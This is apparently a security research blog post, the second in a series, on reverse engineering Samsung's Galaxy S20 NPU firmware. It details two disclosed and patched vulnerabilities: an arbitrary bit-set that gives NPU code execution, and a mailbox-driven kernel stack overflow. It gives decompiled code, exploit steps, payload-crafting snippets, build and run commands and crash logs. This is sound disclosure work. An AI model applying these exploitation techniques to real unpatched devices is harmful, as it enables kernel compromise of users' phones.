Disclaimer
This work was done while we were working at Longterm Security and they have kindly allowed us to release the article on our company's blog.
After an in-depth analysis of the NPU OS and its interaction with the Android kernel, this second part gives a more offensive outlook on this component. We will go through the main attack vectors to target it and detail two vulnerabilities that can be chained together to get code execution in the NPU from the NPU driver before pivoting back into the kernel.
This article is the second part in a series about reversing and exploiting Samsung's Neural Processing Unit. NPUs are generally used to provide dedicated computing power for machine learning and AI-related algorithms. While it could make for an interesting article, if you've read the first part, you know that our primary interest is rather the underlying custom OS Samsung has implemented for its NPU.
Part 1 focused on reverse engineering almost exhaustively what could be considered the kernel of the NPU OS, i.e. all the subsystems related to memory allocation, task scheduling, event handling, etc. While reading it is encouraged to understand this second part, it's not a prerequisite. We will try to provide the necessary context along the way so that you can still follow easily.
In this second part, we will detail two vulnerabilities that were identified while reverse engineering the NPU OS. We will also explain how an exploit can be constructed to trigger a buffer overflow in the Android kernel from a user able to access the NPU driver.
Regarding the disclosure process, these issues have been reported to Samsung and have been patched in their May and June security bulletins under the identifiers SVE-2021-20204
and SVE-2021-21074
. The exploits used in this article are tailored for the Samsung Galaxy S20 SM-G980F
running the unpatched firmware G980FXXS5CTL5 from January 2021.
Now that we are done with the introduction, let's move on to the analysis of the first vulnerability identified: a limited write to an arbitrary address in the NPU's address space.
As we have explained previously, the NPU is a dedicated chip running its own firmware independently from the Android kernel. In simplified terms, the NPU is a blackbox providing an API that can be queried from the kernel. Inputs are sent to it, ML algorithms do their magic, and the results are sent back.
In the first part of this series, in the section called Interacting with the NPU, we explained how the NPU and the kernel communicate using a system of shared memory and mailboxes. In a nutshell, the kernel starts off by mapping the NPU's shared memory regions using init_iomem_area
. It then creates a request for the NPU and writes into the mailbox by calling npu_session_put_nw_req
. Once the message is ready to be sent, an interrupt is triggered and the NPU is notified that a new request is waiting in its low priority mailbox.
The task responsible for the low priority mailbox parses the message using mbx_dnward_get
and calls the corresponding command handler in mbx_msghub_req
. The 9 command handlers implemented in the NPU are defined in init_ncp_handlers
.
void init_ncp_handlers(struct ncp_handler_state_t *ncp_handler_state) {
ncp_handler_state->_unk_0x364 = 4;
/* Resets messages state */
for (int i = 0; i < NB_MESSAGES; i++) {
ncp_handler_state->messages[i].state = RESPONSE_FREE;
}
/* Initializes the handlers for the request commands */
ncp_handler_state->handlers[0] = ncp_manager_load;
ncp_handler_state->handlers[1] = ncp_manager_unload;
ncp_handler_state->handlers[2] = ncp_manager_process;
ncp_handler_state->handlers[3] = profile_control;
ncp_handler_state->handlers[4] = ncp_manager_purge;
ncp_handler_state->handlers[5] = ncp_manager_powerdown;
ncp_handler_state->handlers[6] = ut_main_func;
ncp_handler_state->handlers[7] = ncp_manager_policy;
ncp_handler_state->handlers[8] = ncp_manager_end;
}
While pretty succinct, this explanation should give you a rough understanding of where our data are coming from and how to map a request type in the kernel to a command handler in the NPU (e.g. COMMAND_FW_TEST
and ut_main_func
).
These handlers are the most obvious entry points into the NPU and targets of choice when it comes to vulnerability research. The next section presents a bug in one of those handlers, namely ncp_manager_load
.
To perform its tasks, the NPU relies on a system of objects called ncp_object
which are filled with inputs sent by the kernel. They are identified by a number and are persistent across requests so that you can perform multiple operations on them if needed. Regarding the type of action that you can do, as the names of the command handlers suggests, it's possible to perform operations such as loading, unloading or processing an object. In our case, we will be looking at the loading process implemented in ncp_manager_load
.
Information sent from the kernel are initially parsed as a struct message
, which specifies the command handler ID, the data to process and its length.
struct message {
u32 magic;
u32 mid;
u32 command;
u32 length;
u32 self;
u32 data;
};
The field data
points to another structure, namely struct command
, and will be passed to the command handlers. The NPU will then be able to retrieve the payload to process as well as other information related to the request in the union c
(e.g. object ID, task ID, etc.):
struct command {
union {
struct cmd_load load;
struct cmd_unload unload;
struct cmd_process process;
struct cmd_profile_ctl profile_ctl;
struct cmd_fw_test fw_test;
struct cmd_purge purge;
struct cmd_powerdown powerdown;
struct cmd_done done;
struct cmd_ndone ndone;
struct cmd_group_done gdone;
} c; /* specific command properties */
u32 length; /* the size of payload */
u32 payload;
};
As can be seen in the code snippet below, after performing some sanity checks on the input values, ncp_manager_load
calls an initialization handler from g_ncp_object_state.callbacks
. If the object we're trying to use is free, the callback used will be ncp_object_load
to which we pass the NCP object as well as the initial pointer on the command
structure from the kernel.
int ncp_manager_load(struct command **cmd_p) {
int ret;
struct ncp_object *obj;
/* Checks if the object ID is not out of bounds */
if (cmd->c.load.oid >= 8) {
ret = 0x106;
return;
}
/* Checks if the task ID is valid and not out of bounds */
if (cmd->c.load.tid >= 2 && cmd->c.load.tid != -1) {
ret = 0x108;
return;
}
obj = g_ncp_object_state.objects[cmd->c.load.oid]
/* Irrelevant object setup */
/* [...] */
/*
* Calls the corresponding initialisation callbacks
* Depending on the current state of the object, one of those callbacks
* could be something like ncp_object_load, ncp_object_process, or
* ncp_object_invalid if we're trying to perform an invalid operation.
*
* In any case, when using an object for the first time, assuming
* memory wasn't tampered with, the function called will be
* ncp_object_load.
*/
(*g_ncp_object_state.callbacks[obj->state * 2])(obj, cmd_p);
/*
* The rest of the function is not really relevant since it won't
* interfere with our exploit once the vulnerable function in
* ncp_object_load returns.
*/
/* [...] */
}
ncp_object_load
checks that the payload and the length are not empty and, if that's the case, it calls parser_init
with a pointer to a field in the ncp_object
, the payload address and its length.
int ncp_object_load(struct ncp_object *obj, struct command **cmd_p) {
int ret;
struct command *cmd = *cmd_p;
/* Checks the payload pointer */
if (cmd->payload) {
/* Checks the payload length */
if (cmd->length) {
/* Parses the payload to fill the NCP object */
ret = parser_init(
&obj->ncp_object_copy_ptr, cmd->payload, cmd->length);
/* [...] */
/*
* The rest of the function is not really relevant and won't
* interfere with our exploit.
*/
/* [...] */
}
The role of parser_init
is central to the loading process: it is responsible for parsing the kernel data stored in cmd->payload
and copying them into the corresponding NCP object.
cmd->payload
is comprised of a header which references data placed after it. This header is a ncp_header
structure and is given below.
/* ncp_header structure used as header for the payload */
struct ncp_header {
u32 magic_number1;
u32 hdr_version;
u32 hdr_size;
u32 intrinsic_version;
u32 net_id;
u32 unique_id;
u32 priority;
u32 flags;
u32 period;
u32 workload;
u32 address_vector_offset;
u32 address_vector_cnt;
u32 memory_vector_offset;
u32 memory_vector_cnt;
u32 group_vector_offset;
u32 group_vector_cnt;
u32 body_version;
u32 body_offset;
u32 body_size;
u32 io_vector_offset;
u32 io_vector_cnt;
u32 reserved[10];
u32 magic_number2;
};
parser_init
starts off by performing sanity checks on the header fields to make sure the kernel did not send an invalid or incompatible payload.
int parser_init(struct ncp_object *ncp_object, ncp_header *payload, int length) {
/* Checks the first magic number at the beginning of the structure */
if (payload->magic_number1 != 0xC0FFEE0)
return 0x10D;
/* Checks the second magic number at the end of the structure */
if (payload->magic_number2 != 0xC0DEC0DE)
return 0x10E;
/*
* Makes sure the header version used by the kernel is the same as
* the NPU.
*/
if (payload->hdr_version != 0x16)
return 0x10F;
/*
* Makes sure the intrinsic API version used by the kernel is the same
* as the NPU.
*/
if (payload->intrinsic_version < 0x15)
return 0x10F;
/* Makes sure the payload does not extend outside the heap */
u32 header_size = length - 0x7C * payload->io_vector_cnt;
if (header_size >= 0x60000)
return 0x10B;
/* [...] */
It then allocates memory for the new NCP object and starts copying data into it.
int parser_init(struct ncp_object *ncp_object, struct ncp_header *payload, int length) {
/*
* Allocates memory to get a copy of the header from the kernel into
* the NPU
*/
struct ncp_header* ncp_header = (ncp_header *)malloc(header_size);
if ( !ncp_header )
return 0x10C;
/* Copies the header from the payload */
memcpy(ncp_header, payload, header_size);
/* NCP object setup ------------------------------------------------ */
/* Addresses relative to ncp_header */
ncp_object->ncp_cpy.buffer = ncp_header;
ncp_object->ncp_cpy.address_vector = \
ncp_header + ncp_header->address_vector_offset;
ncp_object->ncp_cpy.memory_vector = \
ncp_header + ncp_header->memory_vector_offset;
ncp_object->ncp_cpy.io_vector = \
ncp_header + ncp_header->io_vector_offset;
ncp_object->ncp_cpy.group_vector = \
ncp_header + ncp_header->group_vector_offset;
ncp_object->ncp_cpy.chunks = ncp_object->chunks;
ncp_object->ncp_cpy.body = ncp_header + ncp_header->body_offset;
/* Addresses relative to the payload */
ncp_object->ncp_src.buffer = payload;
ncp_object->ncp_src.address_vector = \
payload + ncp_header->address_vector_offset;
ncp_object->ncp_src.memory_vector = \
payload + ncp_header->memory_vector_offset;
ncp_object->ncp_src.io_vector = \
payload + ncp_header->io_vector_offset;
ncp_object->ncp_src.group_vector = \
payload + ncp_header->group_vector_offset;
ncp_object->ncp_src.chunks = ncp_object->chunks;
ncp_object->ncp_src.body = payload + ncp_header->body_offset;
ncp_object->_unk_48 = 0;
ncp_object->vector_cnt = ncp_header->group_vector_cnt;
ncp_object->_unk_54 = 0;
ncp_object->chunk_cnt = 0;
ncp_object->header = ncp_header;
/* ----------------------------------------------------------------- */
/* [...] */
As you can see, some addresses are computed using an offset provided in the payload. While some of those are verified in the kernel, others are left unchecked. In particular, the field group_vector_offset
is used as an offset to retrieve an array of group vectors. A rough decompiled version of the code parsing the group vectors is given below.
int parser_init(struct ncp_object *ncp_object, struct ncp_header *payload, int length) {
/*
* Computes the group_vector address using the user-controlled
* value `group_vector_offset` from the ncp header.
*/
struct group_vector *curr_group_vector;
struct group_vector *group_vectors = \
ncp_header + ncp_header->group_vector_offset;
/* [...] */
u32 vector_ctr = 0;
/* If there are vectors to parse... */
if (ncp_object->vector_cnt) {
while (1) {
/*
* Retrieves the offset and size of the current group vector
* at offsets 0x18 and 0x1c respectively.
*/
u32 intrinsic_offset = group_vectors->intrinsic_offset;
u32 intrinsic_size = group_vectors->intrinsic_size;
/* The intrinsic offset must be 4-byte aligned */
if (intrinsic_offset & 3)
return 0x115;
struct ncp_chunk* chunk = ncp_object->chunks[chunk_id];
if (0x7800 - chunk->_unk_08 < intrinsic_size) {
/* Marks the current group vector as processed */
if (curr_group_vector) {
curr_group_vector->flags |= 8;
/* [...] */
}
}
/* [...] */
/* Moves on to the next group vector */
curr_group_vector = group_vectors;
group_vectors++;
vector_ctr++;
/* If there is no more group vector to parse */
if (vector_ctr >= ncp_object->vector_cnt)
goto GROUP_VECTOR_SUCCESS;
}
}
/* [...] */
GROUP_VECTOR_SUCCESS:
/* Marks the last group vector as processed */
if (curr_group_vector) {
group_vector->flags |= 8;
/* [...] */
}
Once parser_init
has looped over all group vectors successfully, the 4th bit of group_vector->flags
will be set for each of them to signify that they are valid. However, since the address of all group_vector
objects are relative to ncp_header->group_vector_offset
, which is user-controlled, it is possible to set the 4th bit of arbitrary bytes in the address space of the NPU. The only limitation is that the value coinciding with group_vectors->intrinsic_offset
must be 4-byte aligned. The next section explains how this primitive can be exploited to get arbitrary code execution in the NPU.
Before we can start, we need to take a look at the SELinux context to list which components are able to communicate with the NPU.
The SELinux context of Samsung's NPU device driver /dev/vertex10
used to be untrusted_app
. However, as can be seen below, it was made more restrictive after Project Zero's disclosure of vulnerabilities affecting this driver.
x1s:/dev # ls -lZ /dev/vertex10
crw-r--r-- 1 system system u:object_r:vendor_npu_device:s0 82, 10 2021-03-16 12:16 /dev/vertex10
This means that in order to communicate with it, we would need a first privilege escalation to get access to the vendor_npu_device
SELinux context. On the firmware we analyzed, we can see that there are five contexts able to send ioctls to the NPU driver:
hal_camera_default
hal_neuralnetworks_eden_drv_default
hal_vendor_eden_runtime_default
platform_app
snap_hidl
lyte@debian:~/tmp$ sesearch --allow s20_selinux_policy | grep vendor_npu_device | grep ioctl
allow hal_camera_default vendor_npu_device:chr_file { ioctl open read write };
allow hal_neuralnetworks_eden_drv_default vendor_npu_device:chr_file { ioctl open read write };
allow hal_vendor_eden_runtime_default vendor_npu_device:chr_file { ioctl open read write };
allow platform_app vendor_npu_device:chr_file { ioctl open read };
allow snap_hidl vendor_npu_device:chr_file { append getattr ioctl lock map open read watch watch_reads write };
And as far as we can tell, this could be achieved by compromising one of the following processes:
x1s:/dev # ps -ZA | grep -e hal_camera_default -e hal_neuralnetworks_eden_drv_default -e hal_vendor_eden_runtime_default -e platform_app -e snap_hidl
u:r:hal_neuralnetworks_eden_drv_default:s0 system 6104 1 11310600 14172 binder_ioctl_write_read 0 S android.hardware.neuralnetworks@1.3-service.eden-drv
u:r:hal_camera_default:s0 cameraserver 6125 1 10958168 11580 binder_ioctl_write_read 0 S vendor.samsung.hardware.camera.provider@4.0-service_64
u:r:snap_hidl:s0 system 6132 1 10801344 3728 binder_ioctl_write_read 0 S vendor.samsung.hardware.snap@1.1-service
u:r:hal_vendor_eden_runtime_default:s0 system 6179 1 11305928 14196 binder_ioctl_write_read 0 S vendor.samsung_slsi.hardware.eden_runtime@1.0-service
u:r:platform_app:s0:c512,c768 u0_a62 6982 6077 16114388 346668 ep_poll 0 S com.android.systemui
u:r:platform_app:s0:c512,c768 u0_a151 7532 6077 14853708 226100 ep_poll 0 S com.sec.android.app.launcher
u:r:platform_app:s0:c512,c768 oem_5013 7777 6077 14127536 125892 ep_poll 0 S com.sec.location.nsflp2
u:r:platform_app:s0:c512,c768 u0_a124 8517 6077 14024140 107888 ep_poll 0 S com.samsung.android.smartsuggestions
u:r:platform_app:s0:c512,c768 u0_a213 9226 6077 14832340 147584 ep_poll 0 S com.samsung.android.app.spage
u:r:platform_app:s0:c512,c768 vendor_cmhservice 10115 6077 15057436 135868 ep_poll 0 S com.samsung.cmh:CMH
u:r:platform_app:s0:c512,c768 u0_a73 11551 6077 14605848 141736 ep_poll 0 S com.samsung.android.app.cocktailbarservice
u:r:platform_app:s0:c512,c768 vendor_bcmgr 13858 6077 14002784 107068 ep_poll 0 S com.samsung.android.beaconmanager
u:r:platform_app:s0:c512,c768 u0_a116 16417 6077 14578312 144200 ep_poll 0 S com.sec.android.app.camera
u:r:platform_app:s0:c512,c768 u0_a230 22542 6077 14119200 136896 ep_poll 0 S com.samsung.android.calendar
u:r:platform_app:s0:c512,c768 u0_a120 27008 6079 2022612 131968 ep_poll 0 S com.samsung.android.mobileservice
u:r:platform_app:s0:c512,c768 u0_a118 27056 6077 14688588 162236 ep_poll 0 S com.osp.app.signin
u:r:platform_app:s0:c512,c768 vendor_cmhservice 28417 6077 14074464 127488 ep_poll 0 S com.samsung.storyservice
u:r:platform_app:s0:c512,c768 u0_a183 29598 6079 1993840 101000 ep_poll 0 S com.samsung.android.app.smartcapture:screenrecorder
u:r:platform_app:s0:c512,c768 u0_a132 29637 6077 14153028 140804 ep_poll 0 S com.samsung.knox.securefolder
u:r:platform_app:s0:c512,c768 u0_a62 29683 6077 14072516 139300 ep_poll 0 S com.samsung.android.app.routines:RoutineUIProcess
u:r:platform_app:s0:c512,c768 u0_a62 29701 6077 14577548 142168 ep_poll 0 S com.samsung.android.app.aodservice
u:r:platform_app:s0:c512,c768 u0_a116 29743 6077 14596868 145088 ep_poll 0 S com.sec.android.app.camera:QrTileService
u:r:platform_app:s0:c512,c768 u0_a140 29751 6077 14548660 120172 ep_poll 0 S com.sec.android.app.soundalive
u:r:platform_app:s0:c512,c768 vendor_sharelive 29784 6077 14185152 140744 ep_poll 0 S com.samsung.android.app.sharelive
u:r:platform_app:s0:c512,c768 u0_a99 30118 6079 1461684 109072 ep_poll 0 S com.samsung.android.mdx
u:r:platform_app:s0:c512,c768 u0_a89 30155 6077 14116800 137956 ep_poll 0 S com.samsung.android.game.gos
u:r:platform_app:s0:c512,c768 u0_a93 30174 6077 14857764 150664 ep_poll 0 S com.samsung.android.game.gamehome
u:r:platform_app:s0:c512,c768 vendor_cmhservice 32195 6077 14684604 163392 ep_poll 0 S com.samsung.faceservice
Getting access to one of these processes is not the goal of this article and we will assume that we're already running in a SELinux context allowed to send ioclts to /dev/vertex10
.
Writing an exploit for this vulnerability was relatively straightforward, partly because there are few security mitigations used in the NPU. As we can see in the table below, multiple writable sections are not marked as non-executable and, during the initialization of the NPU, the WXN
bit is not set in SCTLR
. It means that if we are somehow able to inject a shellcode into one of the RWX section and redirect the execution flow to it, we could take control of the NPU.
Type | Virtual Address | Physical Address | Size | PXN | XN | NS | AP | B | C | S |
---|---|---|---|---|---|---|---|---|---|---|
Short Desc. | 0x00000000 | 0x50000000 | 0x0001d000 | N | N | N | Writes at PL0 generate Permission faults | Y | Y | N |
Short Desc. | 0x0001d000 | 0x5001d000 | 0x00003000 | N | N | N | Writes at PL0 generate Permission faults | Y | Y | N |
Short Desc. | 0x00020000 | 0x50020000 | 0x0000c000 | N | N | N | Writes at PL0 generate Permission faults | Y | Y | N |
Short Desc. | 0x0002c000 | 0x5002c000 | 0x00004000 | N | N | N | Writes at PL0 generate Permission faults | Y | Y | N |
Short Desc. | 0x00030000 | 0x50030000 | 0x00001000 | N | N | N | Writes at PL0 generate Permission faults | Y | Y | N |
Short Desc. | 0x00031000 | 0x50031000 | 0x00002800 | N | N | N | Full access | Y | Y | N |
Short Desc. | 0x00033800 | 0x50033800 | 0x00001000 | N | N | N | Full access | Y | Y | N |
Short Desc. | 0x00034800 | 0x50034800 | 0x00001000 | N | N | N | Full access | Y | Y | N |
Short Desc. | 0x00035800 | 0x50035800 | 0x00001000 | N | N | N | Full access | Y | Y | N |
Short Desc. | 0x00036800 | 0x50036800 | 0x00001000 | N | N | N | Full access | Y | Y | N |
Short Desc. | 0x00037800 | 0x50037800 | 0x00005000 | N | N | N | Full access | Y | Y | N |
Short Desc. | 0x0003c800 | 0x5003c800 | 0x0002b800 | N | N | N | Full access | Y | Y | N |
Short Desc. | 0x00068000 | 0x50068000 | 0x00018000 | N | N | N | Full access | N | N | N |
Short Desc. | 0x00080000 | 0x50080000 | 0x00060000 | N | N | N | Full access | Y | Y | N |
As you can imagine, we will be using our bit-setting primitive to alter the execution flow. The only questions that remains are:
The answer to the first question is relatively easy. In parser_init
, the payload received by the NPU is copied into a buffer allocated using malloc
and therefore residing on the heap, which spans the executable region 0x80000-0xe0000
. We can place our shellcode at the end of the payload and execute it from the version copied on the heap.
The solution we chose for the second issue was to modify one bit of a function pointer to make it point to our shellcode. Potential candidates for this step include the handlers defined in init_ncp_handlers
which were highlighted at the beginning of this article.
All of these handlers are located in the first code section 0x0-0x1d000
. What's convenient here, is that setting the 4th bit in the 2nd byte of a dword will transform an address in the code section, like 0x14abc
, into 0x80000 | 0x14abc = 0x94abc
, which is now on the heap!
For our exploit, we picked the function pointer of ncp_manager_purge
which initially pointed to 0x14C48
and changed it to 0x94C48
. Since the payload we send from the kernel can be arbitrarily long (at least long enough to control the area around 0x94C48
), afterwards we just need to insert our shellcode at the correct offset and call ncp_manager_purge
from the kernel to make the NPU execute our arbitrary instructions. In the next section, we will list the relevant steps to write an exploit and make this possible.
The exploit we developed for this vulnerability is available here. It first starts by allocating and mapping an ION buffer before opening the NPU driver /dev/vertex10
.
It then loads the payload we want to execute from "/data/local/tmp/payload.bin"
. In the Makefile we provide, the payload is compiled from this file and will output a simple "PATCHED_NPU: hello from the NPU!"
in dmesg
.
The actual exploitation starts with the call to exploit_parser_init_arb_write
, which is going to set group_vector_offset
to the following out-of-bounds value: NPU_SHUTDOWN_OFFSET + NPU_SHUTDOWN_BYTE_POS - NEXT_MALLOC_ADDR
.
NPU_SHUTDOWN_OFFSET
is the offset of ncp_manager_purge
's function pointer.NPU_SHUTDOWN_BYTE_POS
is the position of the second byte which also takes into account the offset induced by the flags
field in the group_vector
object.NEXT_MALLOC_ADDR
is the address returned by malloc when it allocates a chunk for the ncp_header
copy in parser_init
. This value was determined by simply patching the NPU and reading it dynamically (which is possible because there is no signature verification for this binary).This will place the flags
field of our group_vector
object over our targeted byte to change the underlying address from 0x14C48
to 0x94C48
. exploit_parser_init_arb_write
also calls init_ncp_header
which copies the custom payload in the ION buffer that will be sent to the kernel and, ultimately, to the NPU. The rest of the values set in the header are mostly irrelevant and won't be explained in this article.
At this stage, all that remains is to send the data to the NPU. This is achieved by first using the ioctl VS4L_VERTEXIOC_S_GRAPH
and then VS4L_VERTEXIOC_S_FORMAT
. In the exploit, this logic is implemented in the function do_graph_format_ioctl
. VS4L_VERTEXIOC_S_FORMAT
will trigger a call to npu_session_NW_CMD_LOAD
, which executes ncp_manager_load
in the NPU and thus our vulnerable function parser_init
that uses our out-of-bounds group_vector_offset
. Once this ioctl returns, the NPU will have modified the function pointer of its ncp_manager_purge
handler. All that is left to do is to call it.
Although, before we can proceed, we will have to meet a few requirements. COMMAND_PURGE
is sent to the NPU when performing a STREAMOFF
operation. But to call VS4L_VERTEXIOC_STREAM_OFF
, we first need to call VS4L_VERTEXIOC_STREAM_ON
, and being able to call VS4L_VERTEXIOC_STREAM_ON
requires the driver's inqueue
and outqueue
to be properly configured.
The operations needed to configure these queues are implemented in the functions setup_in_queue
and setup_out_queue
. They simply send valid requests that specify the directions VS4L_DIRECTION_IN
and VS4L_DIRECTION_OUT
.
We can now call trigger
to make a VS4L_VERTEXIOC_STREAM_ON
ioctl followed by a VS4L_VERTEXIOC_STREAM_OFF
. If everything went as expected, these calls should succeed and the message "PATCHED_NPU: hello from the NPU!"
should appear in dmesg
.
If you have an unpatched Samsung Galaxy S20, you can try the exploit by first compiling it using the Android NDK and the Makefile provided.
$ make build
/opt/android-ndk/toolchains/llvm/prebuilt/darwin-x86_64/bin/aarch64-linux-android29-clang \
-Tsymbols.ld -fPIC --target=arm-none-eabi -march=armv7a -nostdlib \
-fpie -ffreestanding -ffunction-sections -fomit-frame-pointer -o \
payload.bin payload.c
/opt/android-ndk/toolchains/llvm/prebuilt/darwin-x86_64/bin/aarch64-linux-android-objcopy \
-O binary --strip-all payload.bin
/opt/android-ndk/toolchains/llvm/prebuilt/darwin-x86_64/bin/aarch64-linux-android29-clang \
-o parser_init parser_init.c
You can then push it on a device and run it.
$ make push
// [...]
$ make run
// [...]
adb wait-for-device shell \
su root sh -c "/data/local/tmp/parser_init /data/local/tmp/"
[+] Opening /dev/ion
[+] ION allocation
[+] ION buffer mapping
[+] Opening /dev/vertex10
[+] Loading the payload
The following message should appear in dmesg -w
:
x1s:/ # dmesg -w | grep "PATCHED_NPU"
[ 5454.496319] [__LOW][0005449.475]PATCHED_NPU: hello from the NPU!
We finally have code execution in the NPU! Now we can have a look at the second vulnerability we identified, which can be leveraged to attack the kernel from the NPU.
In this section, we will give a quick recap on how these mailboxes work. If you want more details, you can head over to the first part of this series. As we have said before, the NPU and the kernel exchange data using a system of mailboxes implemented over shared memory. There are four mailboxes organized according to the format given below:
A header is used to keep track of the different read/write pointers into the ring buffers. It is defined using the structure struct mailbox_hdr
:
struct mailbox_hdr {
u32 max_slot;
u32 debug_time;
u32 debug_code;
u32 log_level;
u32 log_dram;
u32 reserved[8];
struct mailbox_ctrl h2fctrl[MAILBOX_H2FCTRL_MAX];
struct mailbox_ctrl f2hctrl[MAILBOX_F2HCTRL_MAX];
u32 totsize;
u32 version;
u32 signature2;
u32 signature1;
};
When a message arrives or a response is sent, the read/write pointers stored in the mailbox_ctrl
structures are updated to reflect the new positions of the cursor inside the ring buffers.
struct mailbox_ctrl {
u32 sgmt_ofs;
u32 sgmt_len;
u32 wptr;
u32 rptr;
};
An illustration of this process is given below:
Keep in mind that all values in the mailboxes and the header are shared and can be changed by either the NPU or the Android kernel. As you might expect, this can lead to bugs if one side trusts the other a bit too much, as we will see in the next section.
For this vulnerability, we will be taking a look at the functions retrieving the output of a NPU request. When the NPU is done handling a command, it will write back the result into the response mailbox f2hctrl[0]
. Once the result is received, the function nw_rslt_manager
is called.
int nw_rslt_manager(int *ret_msgid, struct npu_nw *nw)
{
int ret;
struct message msg;
struct command cmd;
/* [...] */
ret = mbx_ipc_get_cmd((void *)interface.addr, &interface.mbox_hdr->f2hctrl[0], &msg, &cmd);
/* [...] */
}
nw_rslt_manager
then calls mbx_ipc_get_cmd
with the argument &interface.mbox_hdr->f2hctrl[0]
, where interface.mbox_hdr
points to the shared mailbox header.
This function reads the content of the mailbox header, before copying the result of the NPU request into cmd
using __copy_command_from_line
.
int mbx_ipc_get_cmd(char *underlay, volatile struct mailbox_ctrl *ctrl, struct message *msg, struct command *cmd)
{
/* [...] */
/* Reads the values stored in the mailbox header */
base = underlay - ctrl->sgmt_ofs;
sgmt_len = ctrl->sgmt_len;
rptr = ctrl->rptr;
wptr = ctrl->wptr;
/* Checks if the readable size in the buffer is bigger than the message size */
readable_size = __get_readable_size(sgmt_len, wptr, rptr); /* ==> wptr - rptr */
if (readable_size < msg->length) {
ret = -EINVAL;
goto p_err;
}
/* Copies the result from the mailbox into `cmd` */
updated_rptr = __copy_command_from_line(base, sgmt_len, msg->data, cmd, msg->length);
ctrl->rptr = updated_rptr;
p_err:
return ret;
}
static inline u32 __copy_command_from_line(char *base, u32 sgmt_len, u32 rptr, void *cmd, u32 cmd_size)
{
/* need to reimplement accroding to user environment */
memcpy(cmd, base + LINE_TO_SGMT(sgmt_len, rptr), cmd_size);
return rptr + cmd_size;
}
The only check performed is verifying that the readable size in the buffer (i.e. the difference between the read/write pointer) is bigger than the message size. Afterwards, it copies the result from the mailbox buffer into the cmd
which is a variable defined on the stack in nw_rslt_manager
.
However, since we have code execution in the NPU, we will be able to modify the read/write pointer values as well as the size of the incoming message. We could specify, for example, a message with a length of 0x1000
bytes and set the read/write pointers in a such a way that the resulting readable size is 0x1100
. It would pass the condition on the size, but still write 0x1000
bytes in the 0x10-byte long cmd
structure, leading to a buffer overflow once nw_rslt_manager
returns.
The exploit for this vulnerability is built upon the previous one, with the only addition being a different payload available here. With full control over the NPU, the idea is to write a payload that will modify the mailbox header and forge an outgoing response to the kernel.
The steps to exploit this vulnerability are as follows:
0x60
. We can then compute the corresponding address using the beginning of the mailbox region MAILBOX_START
and the segment offset of the response mailbox mailbox_hdr->f2hctrl[0].sgmt_ofs
.#define MAILBOX_START 0x80000
#define CRAFTED_MESSAGE_OFFSET 0x60
struct message *message = \
MAILBOX_START - mailbox_hdr->f2hctrl[0].sgmt_ofs + CRAFTED_MESSAGE_OFFSET;
0x100
, which will overflow the capacity of the 0x10
-byte cmd
kernel structure where the response will be stored.#define MESSAGE_SIZE 0x100
message->magic = MESSAGE_MAGIC;
message->mid = 0;
message->command = COMMAND_DONE;
message->length = MESSAGE_SIZE; /* Size that will overflow the command in the kernel */
message->self = 0x0;
message->data = CRAFTED_MESSAGE_OFFSET + sizeof(struct message); /* The payload is located right after the message */
MESSAGE_SIZE
./* Write pointer: points to the end of the crafted message + 0x100 bytes */
mailbox_hdr->f2hctrl[0].wptr = \
CRAFTED_MESSAGE_OFFSET + sizeof(struct message) + 0x100;
/* Read pointer: points to the beginning of the crafted message */
mailbox_hdr->f2hctrl[0].rptr = CRAFTED_MESSAGE_OFFSET;
At this point, our message is ready to be processed by the kernel. After our payload has been executed by the NPU, it will return gracefully to the command handling function and, along the way, will send an interrupt to the kernel notifying it that a response was received. The kernel will parse it, memcpy
will copy the payload of size MESSAGE_SIZE
into cmd
and when nw_rslt_manager
returns, the buffer overflow will trigger.
If you have an unpatched Samsung Galaxy S20 and want to test this exploit, you can try it by first compiling it using the Android NDK and the Makefile provided.
$ make build
/opt/android-ndk/toolchains/llvm/prebuilt/darwin-x86_64/bin/aarch64-linux-android29-clang \
-Tsymbols.ld -fPIC --target=arm-none-eabi -march=armv7a -nostdlib \
-fpie -ffreestanding -ffunction-sections -fomit-frame-pointer -o \
payload.bin payload.c
/opt/android-ndk/toolchains/llvm/prebuilt/darwin-x86_64/bin/aarch64-linux-android-objcopy \
-O binary --strip-all payload.bin
/opt/android-ndk/toolchains/llvm/prebuilt/darwin-x86_64/bin/aarch64-linux-android29-clang \
-o parser_init parser_init.c
You can then push it on a device and run it.
$ make push
// [...]
$ make run
// [...]
adb wait-for-device shell \
su root sh -c "/data/local/tmp/parser_init /data/local/tmp/"
[+] Opening /dev/ion
[+] ION allocation
[+] ION buffer mapping
[+] Opening /dev/vertex10
[+] Loading the payload
The phone should reboot and the following message should be found in /proc/last_kmsg
.
$ adb shell su root sh -c "cat /proc/last_kmsg" | grep -A20 "Kernel panic"
<0>[ 7717.705033] [2: npu-proto_AST:23209] Kernel panic - not syncing: stack-protector: Kernel stack is corrupted in: nw_rslt_manager+0x2e0/0x2e4
<0>[ 7717.705053] [2: npu-proto_AST:23209] [Exynos][WDT][ EMERG]: watchdog reset is started to 30secs
<6>[ 7717.705075] [2: npu-proto_AST:23209] [Exynos][WDT][ INFO]: TEMP: disable wdt keepalive
<6>[ 7717.705096] [2: npu-proto_AST:23209] [Exynos][WDT][ INFO]: Watchdog cluster 0 stop done, WTCON = 115c18
<6>[ 7717.705120] [2: npu-proto_AST:23209] [Exynos][WDT][ INFO]: s3c2410wdt_multistage_wdt_start: count=0x0000b32b, wtcon=00115c3c
<6>[ 7717.705135] [2: npu-proto_AST:23209] [Exynos][WDT][ INFO]: Watchdog cluster 0 start, WTCON = 115c39
<4>[ 7717.705147] [2: npu-proto_AST:23209] secdbg_wdd_set_start: wdd_info->init_done: true
<6>[ 7717.705162] [2: npu-proto_AST:23209] debug-snapshot: item - log_kevents is disabled
<3>[ 7717.705187] [2: npu-proto_AST:23209] mif: s5100_send_panic_noti_ext: Send CMD_KERNEL_PANIC message to CP
<3>[ 7717.705202] [2: npu-proto_AST:23209] mif: pcie_send_ap2cp_irq: Reserve doorbell interrupt: PCI not powered on
<6>[ 7717.705244] [2: npu-proto_AST:23209] mif: mif_gpio_set_value: SET GPIO AP2CP_WAKE_UP = 1 (wait 0ms, dup 0)
<4>[ 7717.707221] [2: npu-proto_AST:23209] CPU: 2 PID: 23209 Comm: npu-proto_AST FTT: 0 0 Tainted: G S W 4.19.87 #1
<4>[ 7717.707235] [2: npu-proto_AST:23209] Hardware name: Samsung X1SLTE EUR OPEN 21 based on EXYNOS990 (DT)
<4>[ 7717.707246] [2: npu-proto_AST:23209] Call trace:
<4>[ 7717.707263] [2: npu-proto_AST:23209] dump_backtrace+0x0/0x1b0
